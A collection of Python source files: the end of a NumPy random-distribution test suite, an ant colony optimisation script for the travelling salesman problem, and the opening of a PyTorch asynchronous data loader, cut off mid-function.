assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is correct for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype('l'))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != 'little':
val = val.byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(res == md5)
def test_broadcast_size_error():
# GH-16833
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
|
aco.py
|
#!/usr/bin/env python3
#-*-coding:utf-8-*-
# 蚁群算法TSP
import numpy as np
import matplotlib.pyplot as plt
from copy import deepcopy as dcp
from collections import deque
import random as rd
import profile
import multiprocessing as mtp
fig_num = 0
class Ant:
"""
蚂蚁类: 可以设置初始点,循环重置,路径计算
"""
def __init__(self, city, Q = 10):
self.now_pos = 0
self.start = 0
self.path = []
self.plausible = {i for i in range(city)}
self.last_cost = 0
self.Q = Q # 信息素分泌因子
self.city = city
def initialize(self, pos_num):
self.now_pos = rd.choice(range(pos_num))
self.plausible.remove(self.now_pos)
self.path.append(self.now_pos)
self.start = self.now_pos
def updatePos(self, pos):
self.now_pos = pos
self.path.append(pos)
self.plausible.remove(pos)
def reset(self):
self.plausible = {i for i in range(self.city)}
self.plausible.remove(self.start)
self.path = [self.now_pos]
self.now_pos = self.start
self.last_cost = 0
def calculate(self, adjs:np.array):
for i in range(self.city):
self.last_cost += adjs[self.path[i]][self.path[(i + 1) % self.city]]
return self.last_cost, self.path
# 作用于外激素矩阵
def secrete(self, ph_mat):
length = len(self.path)
for i in range(length):
ph_mat[self.path[i]][self.path[(i + 1) % length]] = self.Q / self.last_cost
def back2Start(self):
self.now_pos = self.start
self.path.append(self.start)
class BasicACO:
fig_num = 0
def __init__(self, city = 107, ants = 60, max_iter = 500, init = None):
self.a = 1.0 # 信息启发因子(越大随机性越弱)
self.b = 4 # 期望启发因子(越大越容易局部收敛(启发过大))
self.p = 0.6 # 信息素挥发因子
self.ant_num = ants
self.city = city
self.adjs = np.fromfile(".\\odom.bin")
self.adjs = self.adjs.reshape((city, city))
self.ants = [Ant(city) for i in range(ants)]
self.phm = np.ones((city, city)) / 100 # 外激素矩阵
self.max_iter = max_iter
self.shortest = []
self.cost = float("inf")
self.costs = []
for i in range(ants):
self.ants[i].initialize(city)
self.prefix = self.adjs ** ( - self.b)
self.probs = np.zeros_like(self.prefix)
if init != None:
for i in range(len(init) - 1):
self.phm[init[i]][init[i + 1]] += 1.5
# 输入蚂蚁的index 输出list 一个对应于index蚂蚁的周围可选路径的概率
# 输出可选路径
def choiceForAnt(self, index):
ant = self.ants[index]
pos = ant.now_pos
pl = list(self.ants[index].plausible)
# 列表生成式的profile结果非常差
prob = self.probs[pos][pl]
return pl, list(prob)
# 只在全局周游一次结束后,才开始计算外激素挥发以及分泌
def updateSecretion(self):
self.phm *= self.p # 挥发因子
for i in range(self.ant_num):
self.ants[i].secrete(self.phm)
# 所有蚂蚁进行一次周游
def randomWander(self, fnum):
for _it in range(self.max_iter): # 最外层循环(周游次数)
self.probs = (self.phm ** self.a) * self.prefix
for k in range(self.city): # 周游循环
for i in range(self.ant_num): # 对每个蚂蚁进行循环
if k == self.city - 1:
self.ants[i].back2Start()
cost, path = self.ants[i].calculate(self.adjs)
if cost < self.cost:
self.cost = cost
self.shortest = dcp(path)
else:
pos, choice_vec = self.choiceForAnt(i)
# print(pos, choice_vec)
next_pos = rd.choices(pos, choice_vec, k = 1)[0]
self.ants[i].updatePos(next_pos)
self.costs.append(self.cost)
self.updateSecretion()
for i in range(self.ant_num):
self.ants[i].reset()
print("Iter %d / %d"%(_it, self.max_iter))
self.shortest = self.exchange(self.shortest)
print("Result(%d):"%(fnum), self.shortest)
print("Random wader(%d ants) for %d times completed."%(self.ant_num, self.max_iter))
self.draw(fnum)
def optimize(self, arr:list):
result = dcp(arr)
result.pop()
result = self.exchange(result)
temp = deque(result)
temp.rotate(int(self.city / 2))
result = list(temp)
result = self.exchange(result)
# 成环操作
result.append(result[0])
return result
def exchange(self, result):
length= len(result)
for i in range(length - 3):
for j in range(i + 2, length - 1):
# 需要交换的情形
x1 = result[i]
x2 = result[(i + 1) % length]
y1 = result[j % length]
y2 = result[(j + 1) % length]
if self.adjs[x1][x2] + self.adjs[y1][y2] > self.adjs[x1][y1] + self.adjs[x2][y2]:
result[(i + 1) % length], result[j % length] = result[j % length], result[(i + 1) % length]
result[(i + 2) % length:j % length] = result[(j - 1) % length : (i + 1) % length: -1]
return result
def draw(self, fnum):
plt.rcParams['font.sans-serif'] = ['SimHei'] # 指定默认字体
plt.rcParams['axes.unicode_minus'] = False
plt.rcParams['font.size'] = 16
_x = np.arange(len(self.costs))
plt.figure(fnum)
plt.plot(_x, self.costs, color = "black")
plt.grid()
plt.xlabel("蚁群周游次数")
plt.ylabel("最短路径长度")
plt.title("蚁群算法迭代情况")
plt.savefig(".\\fig%d.png"%(fnum))
print("Final cost: %f"%(self.costs[-1]))
# plt.show()
if __name__ == "__main__":
# aco = BasicACO(107, max_iter = 200, ants = 500)
# aco.randomWander()
# profile.run("aco.randomWander()")
# aco.draw()
order = ([47, 46, 51, 64, 63, 54, 55, 87, 56, 83, 86, 88, 84, 85, 77, 78, 79, 80, 81, 82, 59, 58, 57, 53, 60, 61, 62, 65, 16, 14, 13, 15, 31, 32, 39, 38, 36, 37, 35, 33, 34, 40, 41, 106, 29, 30, 11, 10, 26, 22, 23, 21, 20, 25, 24, 18, 17, 19, 28, 27, 75, 71, 73, 72, 67, 66, 68, 69, 76, 92, 91, 90, 70, 74, 93, 94, 96, 95, 89, 98, 97, 104, 105, 8, 5, 1, 0, 2, 4, 3, 9, 103, 102, 101, 99, 100, 44, 52, 43, 42, 7, 12, 6, 50, 48, 49, 45, 47])
aco_pool = [BasicACO(107, max_iter = 64, ants = 128, init = order) for i in range(4)]
proc_pool = []
for i in range(3):
pr = mtp.Process(target = aco_pool[i].randomWander, args = (fig_num, ))
fig_num += 1
pr.start()
proc_pool.append(pr)
aco_pool[3].randomWander(3)
|
async_dataloader.py
|
import collections.abc as container_abcs
import re
from queue import Queue
from threading import Thread
from typing import Any, Optional, Union
import torch
from torch._six import string_classes
from torch.utils.data import DataLoader, Dataset
class AsynchronousLoader(object):
"""
Class for asynchronously loading from CPU memory to device memory with DataLoader.
Note that this only works for single GPU training, multiGPU uses PyTorch's DataParallel or
DistributedDataParallel which uses its own code for transferring data across GPUs. This could just
break or make things slower with DataParallel or DistributedDataParallel.
Args:
data: The PyTorch Dataset or DataLoader we're using to load.
device: The PyTorch device we are loading to
q_size: Size of the queue used to store the data loaded to the device
num_batches: Number of batches to load. This must be set if the dataloader
doesn't have a finite __len__. It will also override DataLoader.__len__
if set and DataLoader has a __len__. Otherwise it can be left as None
**kwargs: Any additional arguments to pass to the dataloader if we're
constructing one here
"""
def __init__(
self,
data: Union[DataLoader, Dataset],
device: torch.device = torch.device('cuda', 0),
q_size: int = 10,
num_batches: Optional[int] = None,
**kwargs: Any,
) -> None:
if isinstance(data, torch.utils.data.DataLoader):
self.dataloader = data
else:
self.dataloader = DataLoader(data, **kwargs)
if num_batches is not None:
self.num_batches = num_batches
elif hasattr(self.dataloader, '__len__'):
self.num_batches = len(self.dataloader)
else:
raise Exception("num_batches must be specified or data must have finite __len__")
self.device = device
self.q_size = q_size
self.load_stream = torch.cuda.Stream(device=device)
self.queue: Queue = Queue(maxsize=self.q_size)
self.idx = 0
self.np_str_obj_array_pattern = re.compile(r'[SaUO]')
def load_loop(self) -> None: # The loop that will load into the queue in the background
for i, sample in enumerate(self.dataloader):
self.queue.put(self.load_instance(sample))
if i == len(self):
break
# Recursive loading for each instance based on torch.utils.data.default_collate
def load_instance(self, sample: Any) -> Any:
elem_type = type(sample)
if torch.is_tensor(sample):
with torch.cuda.stream(self.load_stream):
# Can only do asynchronous transfer if we use pin_memory
if not sample.is_pinned():
sample = sample.pin_memory()
return sample.to(self.device, non_blocking=True)
elif elem_type.__module__ == 'numpy' and elem_type.__name__ != 'str_' \
and elem_type.__name__ != 'string_':
if elem_type.__name__ == 'ndarray' \
and self.np_str_obj_array_pattern.search(sample.dtype.str) is not None:
return self.load_instance(sample)
return self.load_instance(torch.as_tensor(sample))
